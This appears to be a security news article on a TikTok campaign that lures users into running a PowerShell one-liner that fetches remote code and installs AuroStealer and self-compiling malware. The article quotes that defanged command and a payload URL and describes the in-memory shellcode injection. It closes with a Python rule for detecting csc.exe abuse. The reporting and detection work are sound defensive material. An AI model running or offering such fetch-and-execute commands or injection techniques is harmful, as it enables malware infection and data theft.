    Hackers Exploit TikTok Videos to Deliver Self-Compiling PowerShell Malware

    Cybercriminals are weaponizing TikTok videos to distribute sophisticated malware through a ClickFix-style social engineering campaign targeting users seeking free software activation.

    Security researchers have identified multiple videos on the platform, some with over 500 likes, that lure victims with promises of free Photoshop activation.

    The attack employs a multi-stage infection chain that delivers AuroStealer and uses advanced evasion techniques, including on-demand code compilation, to bypass security defenses.

    The malicious campaign instructs victims to execute a PowerShell command as administrator: iex (irm slmgr[.]win/photoshop).

    This one-liner downloads and executes the first-stage malicious PowerShell script (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23), which has a VirusTotal detection score of 17/63.

    The script immediately downloads a second-stage payload, updater.exe, from hxxps://file-epq[.]pages[.]dev/updater.exe. Analysis identifies updater.exe (SHA256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8) as AuroStealer, malware designed to harvest sensitive information from compromised systems.

    The malware establishes persistence through scheduled tasks that masquerade as legitimate Windows services, including MicrosoftEdgeUpdateTaskMachineCore, GoogleUpdateTaskMachineCore, AdobeUpdateTask, and WindowsUpdateCheck, randomly selecting names to avoid detection patterns.

    The attack deploys a third payload, source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011), which implements a sophisticated self-compiling technique.

    The malware invokes the Windows C# compiler (csc.exe), located at C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, to compile malicious code directly on the victim's machine during execution.

    This compiled code creates a class that leverages Windows API functions, including VirtualAlloc, CreateThread, and WaitForSingleObject, to allocate memory, inject shellcode, and execute malicious payloads entirely in memory.

    This technique significantly complicates detection efforts because the final malicious code does not exist in a compiled form on disk until runtime, allowing it to evade signature-based antivirus solutions and behavioral analysis systems.

    Security researchers have discovered additional TikTok videos linked to the same campaign promoting fake activation tools for various popular software products.

    Users should avoid executing PowerShell commands from untrusted sources, disable script execution unless necessary, and maintain updated endpoint protection.

    Organizations should implement application whitelisting and monitor for suspicious csc.exe invocations that may indicate self-compiling malware activity.
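    The csc.exe monitoring suggested above can be expressed as a simple triage rule over process-creation telemetry. The following Python is an added illustration, not code from the article or the researchers: it runs over constructed Sysmon-style Event ID 1 records (field names Image, ParentImage, CommandLine, ProcessId are the real Sysmon ones; the event contents and the helper names are made up) and flags compiler launches whose parent is a script host or whose source lives under a user-writable path.

```python
"""Flag csc.exe launches that look like on-host self-compilation.

Added example for the article above; events below are constructed
Sysmon-style process-creation records, not telemetry from the campaign.
"""
import re

# Script hosts that rarely have a legitimate reason to launch the C# compiler.
SCRIPT_HOST_PARENTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "mshta.exe",
}

# Source or response files under user-writable directories. PowerShell's
# Add-Type, for example, writes a temporary .cmdline file under %TEMP%.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Downloads)\\|\\Windows\\Temp\\|\\ProgramData\\",
    re.IGNORECASE,
)


def is_csc(image: str) -> bool:
    """True if the created process image is csc.exe (any framework folder)."""
    return image.lower().endswith("\\csc.exe")


def score_event(ev: dict) -> list:
    """Return the reasons an event is suspicious; an empty list means benign."""
    reasons = []
    if not is_csc(ev["Image"]):
        return reasons
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    if parent in SCRIPT_HOST_PARENTS:
        reasons.append(f"csc.exe spawned by {parent}")
    if USER_WRITABLE.search(ev["CommandLine"]):
        reasons.append("compiles source from user-writable path")
    return reasons


def triage(events: list) -> list:
    """Return (ProcessId, reasons) for every event that scored at least one reason."""
    return [(ev["ProcessId"], r) for ev in events if (r := score_event(ev))]


# Constructed sample records (hypothetical PIDs and paths).
EVENTS = [
    {"ProcessId": 4120,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\victim\AppData\Local\Temp\x1ab2c.cmdline"'},
    {"ProcessId": 5208,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Users\dev\source\repos\App\bin\App.exe C:\Users\dev\source\repos\App\Program.cs'},
    {"ProcessId": 6004, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for pid, reasons in triage(EVENTS):
        print(pid, "; ".join(reasons))
```

A developer's IDE build (the second record) scores nothing, while a compiler launched from PowerShell against a file in %TEMP% scores on both rules; tune the parent list to your own build hosts before alerting on it.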
